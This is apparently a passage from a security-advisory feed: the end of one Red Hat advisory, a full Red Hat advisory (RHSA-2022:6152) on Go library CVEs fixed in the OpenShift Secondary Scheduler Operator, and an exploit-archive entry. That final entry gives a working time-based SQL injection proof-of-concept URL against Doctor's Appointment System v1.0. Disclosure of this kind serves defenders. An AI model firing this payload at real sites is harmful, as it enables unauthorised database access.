https://access.redhat.com/security/cve/CVE-2022-27384  
https://access.redhat.com/security/cve/CVE-2022-27386  
https://access.redhat.com/security/cve/CVE-2022-27387  
https://access.redhat.com/security/cve/CVE-2022-27445  
https://access.redhat.com/security/cve/CVE-2022-27447  
https://access.redhat.com/security/cve/CVE-2022-27448  
https://access.redhat.com/security/cve/CVE-2022-27449  
https://access.redhat.com/security/cve/CVE-2022-27452  
https://access.redhat.com/security/cve/CVE-2022-27456  
https://access.redhat.com/security/cve/CVE-2022-27458  
https://access.redhat.com/security/cve/CVE-2022-31622  
https://access.redhat.com/security/cve/CVE-2022-31623  
https://access.redhat.com/security/cve/CVE-2022-32083  
https://access.redhat.com/security/cve/CVE-2022-32085  
https://access.redhat.com/security/cve/CVE-2022-32087  
https://access.redhat.com/security/cve/CVE-2022-32088  
https://access.redhat.com/security/updates/classification/#moderate

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYxDdV9zjgjWX9erEAQifSA//aRBkVx5vWWSNWiR+bpq9ro9ZZgI9c1kZ  
CfYDwuybF1RIkEyfkEnDsc09/UzIAumlRqiAWYitb3novcS9G3+PhMI3tNK1lGXm  
wVEZ06kY69AxLcnHazQSh1smJlgOnA+jeBJA3qbCq9gc9d7jVQQTRmLjcQISW0Nc  
Jdg8klmApRdgwQKvFfINWojVwW5+XCYqzgPags5m4/jMSs+zC64l4iedHzdaK9ni  
UeTF41qPmeiwqKfLkaxa7TXXzYO8Nj8kveZj0F7j4ZnAums+FSVmHGNDWu42OKdk  
CDX4XviQt8ykGt/21WHyeFlvxtWkU2nuzPi4MP1/OF9rh5hgImgPXpY34JNjQ6Xu  
2k90YSbZAkk2knsnbAdaDDoHLAMma4CYfjZL54ll9XTD2VVPfGxTeng2NBCWf17U  
xDqCZTVt2GdrYclmX6CE65u6b6LmO6B+ALnRbB9fFC5bFhT/t+PU4MOGBIKK1238  
6vs07JOn+hkadH7Cy0RJukdcJ1IDz7/8BDXaUQNHzcn2I2cpde8luYX3SfXkQqnH  
N2exSc0lseD/J2gWBlxzZqjWyp6ly7byYELgByugXYuCuB2JJwQA0jPmKY5HHVxp  
vCmDOa7jvP81r/LfN0e0q0oM4UE9yThi1Y4mSiKW1TPpmzRwolejwkW0xUu4fQtW  
V6O5WEsw6KYékr  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-6306-01

Red Hat Security Advisory 2022-6152-01 - Secondary Scheduler Operator for Red Hat OpenShift 1.1.0.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: Secondary Scheduler Operator for Red Hat OpenShift 1.1.0 security update  
Advisory ID:       RHSA-2022:6152-01  
Product:           OSSO  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:6152  
Issue date:        2022-09-01  
CVE Names:         CVE-2022-1705 CVE-2022-1962 CVE-2022-24675  
                   CVE-2022-28131 CVE-2022-28327 CVE-2022-30629  
                   CVE-2022-30630 CVE-2022-30631 CVE-2022-30632  
                   CVE-2022-30633 CVE-2022-30635 CVE-2022-32148  
====================================================================  
1. Summary:

Secondary Scheduler Operator for Red Hat OpenShift 1.1.0

Red Hat Product Security has rated this update as having a security impact  
of  
Important. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a  
detailed severity rating, is available for each vulnerability from the CVE  
link(s) in the References section.

2. Description:

Secondary Scheduler Operator for Red Hat OpenShift 1.1.0

Security Fix(es):

* golang: compress/gzip: stack exhaustion in Reader.Read (CVE-2022-30631)  
* golang: net/http: improper sanitization of Transfer-Encoding header  
(CVE-2022-1705)  
* golang: go/parser: stack exhaustion in all Parse* functions  
(CVE-2022-1962)  
* golang: encoding/pem: fix stack overflow in Decode (CVE-2022-24675)  
* golang: encoding/xml: stack exhaustion in Decoder.Skip (CVE-2022-28131)  
* golang: crypto/elliptic: panic caused by oversized scalar  
(CVE-2022-28327)  
* golang: io/fs: stack exhaustion in Glob (CVE-2022-30630)  
* golang: path/filepath: stack exhaustion in Glob (CVE-2022-30632)  
* golang: encoding/xml: stack exhaustion in Unmarshal (CVE-2022-30633)  
* golang: encoding/gob: stack exhaustion in Decoder.Decode (CVE-2022-30635)  
* golang: net/http/httputil: NewSingleHostReverseProxy - omit  
X-Forwarded-For not working (CVE-2022-32148)  
* golang: crypto/tls: session tickets lack random ticket_age_add  
(CVE-2022-30629)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s)  
listed in the References section.

3. Solution:

For Secondary Scheduler Operator 1.1.0 see the following documentation,  
which  
will be updated shortly, for detailed release notes:

For more information on Secondary Scheduler Operator for Red Hat OpenShift  
1.1.0, see the following release notes:

https://docs.openshift.com/container-platform/4.11/nodes/scheduling/secondary_scheduler/nodes-secondary-scheduler-release-notes.html#secondary-scheduler-operator-release-notes-1.1.0

4. Bugs fixed (https://bugzilla.redhat.com/):

2077688 - CVE-2022-24675 golang: encoding/pem: fix stack overflow in Decode  
2077689 - CVE-2022-28327 golang: crypto/elliptic: panic caused by oversized scalar  
2092793 - CVE-2022-30629 golang: crypto/tls: session tickets lack random ticket_age_add  
2105001 - [SSO] Secondary scheduler version is shown as unknown in the operator logs  
2107342 - CVE-2022-30631 golang: compress/gzip: stack exhaustion in Reader.Read  
2107371 - CVE-2022-30630 golang: io/fs: stack exhaustion in Glob  
2107374 - CVE-2022-1705 golang: net/http: improper sanitization of Transfer-Encoding header  
2107376 - CVE-2022-1962 golang: go/parser: stack exhaustion in all Parse* functions  
2107383 - CVE-2022-32148 golang: net/http/httputil: NewSingleHostReverseProxy - omit X-Forwarded-For not working  
2107386 - CVE-2022-30632 golang: path/filepath: stack exhaustion in Glob  
2107388 - CVE-2022-30635 golang: encoding/gob: stack exhaustion in Decoder.Decode  
2107390 - CVE-2022-28131 golang: encoding/xml: stack exhaustion in Decoder.Skip  
2107392 - CVE-2022-30633 golang: encoding/xml: stack exhaustion in Unmarshal

5. JIRA issues fixed (https://issues.jboss.org/):

WRKLDS-466 - Secondary Scheduler Operator for Red Hat OpenShift 1.1 release

6. References:

https://access.redhat.com/security/cve/CVE-2022-1705  
https://access.redhat.com/security/cve/CVE-2022-1962  
https://access.redhat.com/security/cve/CVE-2022-24675  
https://access.redhat.com/security/cve/CVE-2022-28131  
https://access.redhat.com/security/cve/CVE-2022-28327  
https://access.redhat.com/security/cve/CVE-2022-30629  
https://access.redhat.com/security/cve/CVE-2022-30630  
https://access.redhat.com/security/cve/CVE-2022-30631  
https://access.redhat.com/security/cve/CVE-2022-30632  
https://access.redhat.com/security/cve/CVE-2022-30633  
https://access.redhat.com/security/cve/CVE-2022-30635  
https://access.redhat.com/security/cve/CVE-2022-32148  
https://access.redhat.com/security/updates/classification/#important

7. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYxCI69zjgjWX9erEAQhXXxAAosQlZxGWGILaGuYUJr/S/jXROYtor0Wv  
z8na9oZNTgJG086tiPehf+HAUIbwIRlExUg/fI0TkkQILou0JDqDKbMfxuvZ3You  
vgUzKoLHnf541JJp1tjLFbHl+dcG1ohoXEFdh6UpmhxILu56hnC7jB7hfAXnye/E  
wIwwtRkG7tzS2f81vFG1TwWunVddvtNy6ITnqkBLWvjRP0ihk6mBt4iBz4NOKYFi  
x/7TRZUGV+ILeP++g7qsbehOwZLj2p9NzqE2cRw/A1DP3WVRglKaGuhd46kR9mtn  
o0LK9jSBJ0QMPXDvEk52PU4J8yDqhhvTWSeCrFg0rwC3Xd3/41xxKTo9htbLOHfQ  
Ei359sevhBTpLH1sdS7/jjmd8jMYe9CZXxk0Ck87e+T17MXOyKVHSsMFjZR1Pgfu  
wXAMZaIut1l23RA+3T79jYUnrbB+zD4rDk5mwLuurO8n6y7Bw1Dr1Rr2r1mKgr7N  
rxIpHDhw2nWjEhnhl91+2r2ucLvfD6qqsdnV58XTKdLUqNbYAOL1p3tGljqmUVsH  
f2YWDoEc3LpbVoT12xbxqnmJRQGmWwfsNRY4tr6w+qVHgKjBAjMGaDhd4gIVEuGi  
08mdVFBRqUPBbkIZu9ku5Eh8dgg2NcOFN1naDYb3AaNJp7+garNbcGFL1lIK0cBM  
ZO93shdrUmc=3goO  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-6152-01

Doctor's Appointment System version 1.0 suffers from a remote SQL injection vulnerability. Original discovery of SQL injection in this version is attributed to Soham Bakore and Nakul Ratti in February of 2021.

    # Exploit Title: SQLi - Doctor's Appointment System v1.0# Google Dork: N/A# Date: 7/13/2022# Exploit Author: Abdullah Zaid - @_aznull# Vendor Homepage:https://www.sourcecodester.com/hashenudara/simple-doctors-appointment-project.html# Software Link:https://www.sourcecodester.com/sites/default/files/download/hshnudr/edoc-doctor-appointment-system-main_1.zip# Version: 1.0# Tested on: Linux# CVE : CVE-2022-36201POC:http://localhost/edoc/patient/booking.php?id=1%20AND%20(SELECT%203436%20FROM%20(SELECT(SLEEP(10)))dZls)

Tag

#sql